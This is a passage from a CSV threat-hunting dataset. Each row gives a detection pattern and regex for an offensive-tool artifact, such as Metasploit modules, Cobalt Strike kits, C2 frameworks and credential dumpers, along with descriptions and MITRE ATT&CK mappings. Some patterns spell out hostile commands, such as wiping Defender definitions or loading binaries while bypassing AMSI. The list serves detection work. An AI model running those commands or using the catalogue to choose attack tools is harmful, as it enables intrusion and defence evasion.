tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*mouseshaker.*",".{0,1000}mouseshaker\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*MoveKit-master.zip*",".{0,1000}MoveKit\-master\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*move-msbuild * http move.csproj*",".{0,1000}move\-msbuild\s.{0,1000}\shttp\smove\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*move-pre-custom-file *.exe *",".{0,1000}move\-pre\-custom\-file\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*movfuscator*",".{0,1000}movfuscator.{0,1000}","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","9138","387","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" "*Mozilla/5.0 (*-bit) dnstwist*",".{0,1000}Mozilla\/5\.0\s\(.{0,1000}\-bit\)\sdnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*mozilla2john.py*",".{0,1000}mozilla2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*MpCmdRun.exe -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*MpCmdRun.exe* -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe.{0,1000}\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*mpgn/BackupOperatorToDA*",".{0,1000}mpgn\/BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*mqtt_check.py*",".{0,1000}mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mr.un1k0d3r@gmail.com*",".{0,1000}mr\.un1k0d3r\@gmail\.com.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*Mr-B0b/SpaceRunner*",".{0,1000}Mr\-B0b\/SpaceRunner.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*Mr-Cyb3rgh0st/Excel-Exploit*",".{0,1000}Mr\-Cyb3rgh0st\/Excel\-Exploit.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*mrd0x/BITB*",".{0,1000}mrd0x\/BITB.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*mremoteng_decrypt.py*",".{0,1000}mremoteng_decrypt\.py.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","120","43","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" "*mRemoteNG-local.py*",".{0,1000}mRemoteNG\-local\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*MrEmpy/Reaper*",".{0,1000}MrEmpy\/Reaper.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*Mr-Un1k0d3r*",".{0,1000}Mr\-Un1k0d3r.{0,1000}","offensive_tool_keyword","Github Username","github username Mostly Red Team tools for penetration testing. Twitter - @MrUn1k0d3r","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Mr-Un1k0d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Mr-Un1k0d3r/DKMC*",".{0,1000}Mr\-Un1k0d3r\/DKMC.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*ms_teams_exports_usernev_dll.txt*",".{0,1000}ms_teams_exports_usernev_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*ms04_007_killbill.*",".{0,1000}ms04_007_killbill\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms14-068.py -u *",".{0,1000}ms14\-068\.py\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ms14-068.py -u*",".{0,1000}ms14\-068\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ms14-068_check*",".{0,1000}ms14\-068_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ms16_075_reflection_juicy.rb*",".{0,1000}ms16_075_reflection_juicy\.rb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*ms17_010_eternalblue*",".{0,1000}ms17_010_eternalblue.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms17_010_eternalblue.*",".{0,1000}ms17_010_eternalblue\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms17_010_psexec*",".{0,1000}ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ms17_010_psexec.*",".{0,1000}ms17_010_psexec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MS17-010*",".{0,1000}MS17\-010.{0,1000}","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2098","1102","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" "*ms17-010_check*",".{0,1000}ms17\-010_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*MSBuild.exe NetLoader.xml*",".{0,1000}MSBuild\.exe\sNetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*MSBuildShell*",".{0,1000}MSBuildShell.{0,1000}","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","3","281","75","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z" "*MScholtes/PS2EXE*",".{0,1000}MScholtes\/PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*msf*/logs/framework.log*",".{0,1000}msf.{0,1000}\/logs\/framework\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_api_doc.rb*",".{0,1000}msf_api_doc\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_cve_extracter.py*",".{0,1000}msf_cve_extracter\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*msf_exec.py*",".{0,1000}msf_exec\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_matchers*",".{0,1000}msf_matchers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf_payload.ps1*",".{0,1000}msf_payload\.ps1.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*msf-auxiliarys*",".{0,1000}msf\-auxiliarys.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*msfcallback.bin*",".{0,1000}msfcallback\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*msfconsole *",".{0,1000}msfconsole\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*msfconsole*",".{0,1000}msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfconsole.*",".{0,1000}msfconsole\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfconsole_spec*",".{0,1000}msfconsole_spec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfcrawler.*",".{0,1000}msfcrawler\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - 